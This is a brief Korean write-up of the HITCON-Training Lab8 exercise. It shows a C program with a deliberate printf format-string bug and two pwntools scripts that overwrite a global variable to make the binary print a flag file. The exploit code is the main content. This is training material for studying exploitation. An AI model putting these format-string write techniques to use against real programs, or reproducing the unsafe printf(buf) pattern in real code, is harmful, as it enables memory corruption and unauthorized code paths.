[HITCON-Training]Lab8

그냥 magic 값만 맞춰주면 풀리는 문제다.

#include <stdio.h>

int magic = 0 ;

int main(){
	char buf[0x100];
	setvbuf(stdout,0,2,0);
	puts("Please crax me !");
	printf("Give me magic :");
	read(0,buf,0x100);
	printf(buf);
	if(magic == 0xda){
		system("cat /home/craxme/flag");
	}else if(magic == 0xfaceb00c){
		system("cat /home/craxme/craxflag");
	}else{
		puts("You need be a phd");
	}

}

pwn 모듈 사용해서 magic의 값을 0xFACEB00C로 바꿔주면 된다.

exploit.py

from pwn import *

e = ELF('./craxme')
p = process('./craxme')

offset = 7
magic = 0x0804A038
#payload = fmtstr_payload(offset,{magic:0xDA})
payload = fmtstr_payload(offset,{magic:0xFACEB00C})
p.sendlineafter(':',payload)
p.interactive()

exploit.py

from pwn import *

e = ELF('./craxme')
p = process('./craxme')
offset = 7

payload = p32(0x0804A038)
payload += '%{}d'.format(214)
payload += '%{}$hhn'.format(offset)

p.sendlineafter(':',payload)
p.interactive()